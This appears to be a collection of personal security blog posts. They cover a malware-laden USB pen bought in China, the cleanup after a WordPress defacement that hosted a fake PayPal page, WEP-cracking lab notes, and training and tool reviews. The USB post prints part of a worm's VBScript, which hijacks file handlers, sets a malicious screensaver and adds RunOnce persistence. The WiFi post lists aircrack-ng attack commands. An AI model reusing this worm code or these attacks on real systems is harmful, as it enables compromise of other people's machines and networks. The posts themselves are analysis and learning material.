From China with Love

Posted on by
1

I received two gifts from a family member returning from China.

It was a lovely thought and I was touched by the gesture.

Both items are of the geek variety and bought from stalls, one a ball point pen with a built in 2GB USB stick that can act as a voice recorder and the other a 240GB USB stick.

2GB USB voice recorder pen

3-in-1 Pen-recorder-malware

240GB Flash drive - really?

Now, from having worked with companies that operate in Asia and especially China, I’ve often discovered that some of pieces of technology come with free added “extras”.

I have to admit some level of amazement when told of the 240GB USB flash drive, especial when the afore mentioned relative said he hadn’t seen the 500GB USB flash drive after he’d bought this one. I thought the largest current flash drive available was on 128GB, sadly it appears I was right. A quick search of 240G Sony quick turned up this page. This thing is a total fake and is actually a whooping 32MB. However it looks pretty and I can amaze my friends and family with a 234GB drive that I can’t save anything to. Might give it to the Auditors next time they’re in the office.

Wow it's really 234GB - honest!

I plugged both USB devices in to a spare Linux machine, just to see it any software was on either. The Fake 240GB USB was empty, but the recording pen had lots of goodies.

The first thing that caught my eye was the autorun.ini file. A quick look at that pointed to a MS-DOS.COM saved on the pen. After a quick imaging of the files, I decide to open a copy of the MS-DOS.COM.

The random looking junk didn’t quite look like normal .COM file junk, if only I could have taken SANS Reverse-Engineering Malware: Malware Analysis Tools and Techniques course, I may have been able to do a better analysis. However, halfway through the file, the weird characters disappeared and stuff I can recognize and understand appears in plain English.

This is some of what I extracted:

Dim fs,rg

Set fs = CreateObject("scripting.filesystemobject")

Set rg = CreateObject("wscript.shell")

On Error Resume Next

rg.RegWrite "HKCR\.vbs\", "VBSFile"

rg.RegWrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE","C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"

rg.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"

rg.RegWrite "HKCR\MSCFile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"

rg.RegWrite "HKCR\regfile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"

rg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"

rg.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"

– Plenty more VBS code chopped out –

This clearly isn’t a real .Com file. Two seconds of searching found out that this is a variant of the SillyFDC worm. A write up of it here talks how it was slapping the US military systems around back in 2008. Most antivirus software would have picked it up, but then again, why test it.

Moral of the story, if you buy kit like this, for the “best price” for a back street stall, buyer beware. Unless you’re a Malware researcher then go mad, it’s Christmas day with every item bought!

Being Defaced and cleaning up

Posted on by
Reply

One of the wonderful pieces of IT security defense is planning for when you get your arse handed to you. The more technical term is incident response, but it’s not as much fun to say to your mates at the pub.

Being attacked and having to recover is sadly part of IT life these days, but the more practice, the better you get at it. I’m oddly indebted to this particular attacker as it meant I’ve had to spend time understanding how the hosting company works, how this site is put together and the glaring shortfalls of outsourcing management and security to a third party.

On the 31st of May this blog was defaced and had a number of files uploaded to it.

The defacement was of a political, religious statement nature, which I’d suggest defacing web sites is a bit of a waste of time. Given the attacker lives in a democracy, whether he believes it is or not, I’d recommend he’d spend the time working in worth while, legal groups to express his views or simply help out the local community. If you have a voice and a vote use it, people change the world by words and deed, not by petty vandalism or criminal Paypal pharming schemes to steal money from your fellow man.  I’ll get off my soap box now.

On the 7th of June, I actually noticed the defacement. Oops.

Note to self – be more narcissistic and look at my own blog more often.

In under a minute, I went from shock to annoyance to curiosity. How did this guy get in, what was he actually doing and would I be able to work out how to stop it again?

I wasn’t able to log on to the cpanel to control the site, the wacky security of putting it on a random port over https does not work for locked down corporate environments.

So the first step was to call the hosting company and ask if this was a mass defacement or just me. A number of hosting companies hosting word press site had be compromised due to their bad practices, so best to check. Fortunately for  me I go the support “consultant” that struggled with English. After a painful twenty minutes, the best I got out of the conversation was for him to reset a password and mine was the only site hacked. More on this later. He did offer the gems of: Change your password every couple of weeks and don’t set stuff to 755. Magic. If I was a normal human being 755 would mean the world to me. Thank you!

This is now a great time to bring up the SANS six step incident response steps process. These steps help work through how to deal with this mess:

1. Preparation 2. Identification 3. Containment 4. Eradication 5. Recovery 6. Lessons learned

Identification

After  finish work, I finally got on to the site control panel via cpanel and kicked off a backup of the site just to examine off line what had happened.

The defacement was a simple replacement of the index.php file, which contained a lot of meta data. This meta data confirmed the OS, who had customized the OS and where to get a copy of it, what version of Word the defacement page had been made with and a few other pieces of helpful data. What was really interesting was the uploaded fake PayPal.fr payment page sub-directories and file in the public_html folder. The blog’s site logs also contained entries like this:

/~silkhous/PayPaI.Com/confirmmation4548664512884645384534/B!M@R/ProfileCCAdd.js

The /~silkhous refers to another home directory on the same hosted server as my blog. Looks like the other site was suffering the same problem, so much for me with the only site being attacked. Nice work hosting provider!

This caused an instant road block. Alerting Paypal that people are being pharmed out weighted my curious and recover process. As there’s no clear, direct way to contact Paypal’s security team, I had to go through customer service. The very nice lady somewhat taken back that someone might do this and asked me to submit my findings to an email address. When I asked to speak to someone directly, I was told the security team was a back office group and couldn’t be directly contacted. Oh well, the Paypal rep was helpful and was pretty excited, so I sent the details off and went back to the clean up.

Containment, Eradication and Recovery

What I’d found didn’t give me any real clear indications of how the attacker got in. I knew what he’d done to the site, and as he’d kindly defaced the site and tagged it with his email address, I was able to out a fair bit of information on him just from search engines. Still, no clear method of how he got in.

The common options to break in to a WordPress/web site are

1) The hosting provide is vulnerable to attacks and then control the entire server*

2) Bad passwords – allowing brute force attacks (password guessing)

3) Poorly written plug-ins allow attackers to execute code and commands on the site

4) Old version of Word Press allow attackers to execute code through know vulnerabilities

I can safely rule out 2 and 4 as entry points, which leaves only 3 something I can do about now.

Since I make backups of the site every after x number of blog pieces I upload, I decided to delete the entire site and upload a fresh copy of WordPress. Using a couple good articles from WordPress, I picked the parts that worked for me from them to add additional security.

http://codex.wordpress.org/FAQ_My_site_was_hacked

http://codex.wordpress.org/Hardening_WordPress

I then move back old versions of the content to the blog, tested, made a few more changes, took a back up again and then reset the passwords again and ran one final check.

*Should this happen again, time to move web site providers to someone who keeps their OS and software up to date…

Lessons Learned

  • RTFM WordPress’ security guides
  • Avoid having gadgets and plugins just because the look pretty
  • Understand the structure and layout of WordPress and the web site
  • More regular backups
  • Rotate the access logs off the server

So am I safe now?

Possibly, possibly not.

I can say I’ve improved the security of the site and cleaned up some crap. As I still don’t know how he got in, he may just read this, get annoyed and deface the site again using the same hole he did last time. As I think he just ran an automated scanner to find “x” problem then automatically exploit it, he probably won’t read this or even visit the site. Saying that, only a very small number of sites got exploited, so he might come back to visit. :-)

If so and that’s you Mr Attacker- Bonjour là, signalent un commentaire et me font savoir vous êtes entré la première fois. Merci !

I would have used Arabic, but I don’t really trust the translation software. I’ve seen what it does to English.

Study, more art than science

Posted on by
Reply

The folks on Twitter has provided a couple of quite though provoking links on the subject of study

Jason Haddix linked this

http://measuringmeasures.com/blog/2010/4/19/7-tips-for-successful-self-learning.html

The folks at Cisco Security linked this:

http://etherealmind.com/why-the-ccie-program-is-more-useful-than-the-certification-itself/

I like to think each of us has to find our own way to study, whether it be driven by passion, need or simple curiosity.

My current method is to block out an hour from 8 to 9 pm for serious study. This means avoid distractions – random browsing, tv, tweets, books, arranging DVD’s in alphabetical order and so on – and focusing on one topic.

This, so far, has sort of worked.

www.Packetstan.com – A new Nation for Packets to stand proud

Posted on by
Reply

It’s as if one of my many random, vague and confused wishes to the Webi-verse has finally been answered.

Mike Poor has created:

www.packetstan.com 

for all things packet-like.

It’s all about packets and crazy things people do to them.

If that wasn’t enough the first article has been written by Judy Novak. Judy is a rock star of the analyst world and recent received a lifetime achievement award from SANS for her work in this field, plus was one of the authors of the Intrusion Detection In-Depth SANS 503 course. 

If you have no idea what I’m on about, or why I think this is amazing for network/security professionals sign up for Intrusion Detection In-Depth immediately. Do it now, right now. I’ll still be here once you’ve taken a magical trip in to the core of the Internet’s communication DNA and peeked in to a world full of Hex, binary and payloads.

I can only hope Mike convinces Judy to spill some more of her secrets and tips, plus get  many more people to chime in with articles, as this would be an utterly amazing resources for anyone that has to deal with analysing packets on or off the wire.

GSE Exam in SANS Network Security 2010

Posted on by
3

Been a busy few months in the real world with work, life and everything else.

Since passing the GSE written exam, I’ve been building up a lab, practical practice examples and a stock of reading reference materials. I’ll blab on about the books and what they are at some later point. An interesting aside, some of the operating systems used in the GSE exam have been updated. Backtrack 1 now becomes Backtrack 4 and Fedora 4 becomes Fedora 12 so a great time to master more current OS’s.

The two day practical part of the GSE exam takes place in Las Vegas on the 18th and 19th of September. This means I’ll finish two days of examination hell just in time for the SANS Network Security 2010 conference

As I’m in Las Vegas and SANS is running on of its biggest conferences of the year, I’d be remiss to not try to squeeze in a bit more training.

I’ve applied to be a volunteer as part of SANS work study program and crossing my fingers to be accepted. With forty courses on offer, my number one choice is Steve Sim’s Developing Exploits for Penetration Testers and Security Researchers.

This course is really out of my comfort zone and a huge challenge in itself, nevermind the GSE study that I’m doing. I’ve only really played with the skills the course has taught while studying for OffSec’s PWB exam, but the topic is compelling and will help lift the shroud of script kiddie tools that I use. With both Steve Sims and Jim Shewmaker teaching the course it, should be absolutely brilliant to be able to learn from both these guys and mature my understanding this complex piece of IT security.

I’ve noticed that some very smart cookies are taking this course, including Wesley McGrew. Great, real security researchers, coding gurus and me. Well,  at least I know I asking the person sitting next to me what this all means  should get a sensible answer  :-)

Things that know PING, Packet Decode

Posted on by
Reply

The last few weeks have been all about the packets, it seems. We’ve found and fixed a couple of wacky problems at work by looking at packet captures, Netmon 3.4 beta is out, I’ve devoured Laura Chappell’s new wireshark book, started playing with scapy, read the new Honeynet challenges and now I discover my 502 teacher, Chris Brenton, has a web site and iPhone app on showing love to the packets!

While stuck on a bus, I was idly sifting through Apple’s app store when I found Packet Decode. Some what intrigued, I have a look at it and noticed it was made by my old SANS instructor. Hoping this wasn’t some wacky joke by Chris, I bought the app and had a play. The simple description is that is it a IP/ICMP/TCP & UDP (v4 and v6) cheetsheet on steroids.

This is pretty darn helpful as Chris has written clear description of each field within the packet and has some nifty filters for wireshark and TCPdump. Some though on how the info is displayed means this isn’t cumbersome to navigate, making it a function and useful portable reference. Now if only he added DNS section and my paper SANS TCP/IP cheetsheet could rest happy.

Great as a quick reference, memory jogger or, as I intend to unleash at the next geek pub crawl, away to torture those around me with random facts and demands to know the tcpdump filter syntax for detecting tcp packets with windows size of less than 100. Hours of fun!

Mr Brenton’s web site http://www.chrisbrenton.org/ has some great articles and a number of packet challenges well worth taking the time to work through.

Exception has been thrown by the target of an invocation and other Forefront humour

Posted on by
Reply

My wonderful Forefront Client Security management console (or FCSMC for the party people) crashed and this lovely, helpful error appeared every time I attempted to load the console. This is bad, as  can’t really look or do anything with the console. Bad  FCSMC!

Or the easy to read version:

FX:{f337d96e-45c1-4106-88b1-e417a7703d6b}

Exception has been thrown by the target of an invocation.

Exception type:

System.Reflection.TargetInvocationException

Exception stack trace:

at Microsoft.ManagementConsole.Internal.SnapInMessagePumpProxy.OnThreadException(Object sender, ThreadExceptionEventArgs e)
at System.Windows.Forms.Application.ThreadContext.OnThreadException(Exception t)
at System.Windows.Forms.Application.OnThreadException(Exception t)
at System.Windows.Forms.Control.InvokeMarshaledCallbacks()
at System.Windows.Forms.Control.WndProc(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)

Now The server and console had been working fine for the last six months without issue. Despite no obvious alerts, warnings or errors in any of the Windows event logs or SQL logs/checks the standard fixes won’t work. Somewhat annoying, but having worked with Forefront for a while now, I took my default posture with these types of problems: Blame SQL.

After taking my problem to The Grumpy old DBA for “his”  SQL databases breaking again, he used his mastery of many years to cut and paste the error in to Google. Dominik’s Forefront Security Blog and this link popped up and refers to kb942581, which is a hotfix SQL script.

From the cause blurb on the page: “A server-side SQL stored procedure that the Forefront Client Security dashboard uses incorrectly calculates statistics when the managed computers have not reported to the collection server for more than 30 days.”

Running the script fixed the problem. Oh joy.

Offensive Security’s Wifu exam – All over, red rover

Posted on by
Reply

Finally.

Took the exam tonight, completed all the required challenges and sent off the proof to be marked.

I had a few minor problems trying to get my connection details to start the exam, but these were swift resolve by one of the very able admins in the IRC #offsec channel. He was a gentleman and got me underway swiftly.

The actual exam is straightforward and is derived from the course material. Learn and study the material, be able to do all the practicals on your own systems and you should pass.

Unlike the PWB course, this is designed for beginners to wireless theory and attacks. The wifu course provides a solid grounding in the 802.11x fundamentals and is a well balanced, straightforward introduction, but is focused toward WEP.

Obviously WEP is still alive and well, so the content is still relevant but if you’re looking for more in-depth and all encompassing wireless technologies, such as Bluetooth, Zigbee, and so on , Joshua Wright’s SANS Wireless Ethical Hacking, Penetration Testing, and Defenses would be more appropriate.

Anyway, it was a fun hour and a bit exam and I can claim my 10 CPE for all that work too!

 

Eurotrashsecurity: Security Podcast from the far side of the world – the other far side, that it

Posted on by
Reply

Twitter does have it uses other than discovering the security industry has it fair share of nutters and those that tweet (I’m ‘down’ with all the terms now) their most random thoughts.

Despite the madness and mysterious number of girls in underwear with names of ran-dee-12123 following me, I find a number of gems. The delightful ChrisJohnRiley and crew of the Eurotrash security podcast team are just one of those.

The guys are European based and have their own take of security news and events. Throw in burst of, mainly English, humour and great interviews and we could have a winner here for the Podcasting Sec world.

Some great content and interesting commentary, plus it beats having to endure the our American friends destroying the English language during their discourse on security ;-)

Either subscribe in iTunes or http://www.eurotrashsecurity.eu/episodes/eurotrash.xml and go listen to the boys on the far side of the world!

Now if the lads can fix up the web site to be a bit more respectable, that would be lovely…

Wifu Aireplay-ng SKA attack problem with Linksys WAP54G

Posted on by
Reply

While (finally) working through the last hands on practical of the excellent Offensive Security’s Wifu course, I hit an odd road block.

The Aireplay-ng  attack on SKA was not going well. This was annoying, to say the least.

My command airodump-ng  –channel 1 –bssid 00:01:02:03:04:05 –w ska wlan0 was running fine and capturing traffic happily from my test  Linksys WAP54G firmware v3.1

The four output files generated from the command appeared, but the magic .xor file refused to appear despite issuing numerous de-authentication commands

airodump-ng  -0 10 –a 00:01:02:03:04:05  -c 00:00:DE:AD:BE:EF wlan0

Turning off and on the wireless client machine’s NIC didn’t fix this either.

I noticed the banner of the airodump-ng output:

CH 1 ][ Elapsed: 10 mins ][ 2010-04-01 09:48 ][ Broken SKA: 00:01:02:03:04:05

A quick search turned up a link to http://www.aircrack-ng.org/doku.php?id=airbase-ng, then the searching turned up various people ranting and talking madness.

Just to finish off my evening study on a sane note, I dug out an old Netgear wireless router and set it up for shared WEP encryption. Joy of joys airodump-ng saw the authentication handshake and dumped it out in to a .xor file just as it did in the notes.

I was then able to crack the massively secure 64 bit (okay 40 bit) shared WEP key in about 10 seconds after generating enough IV’s – Hurra!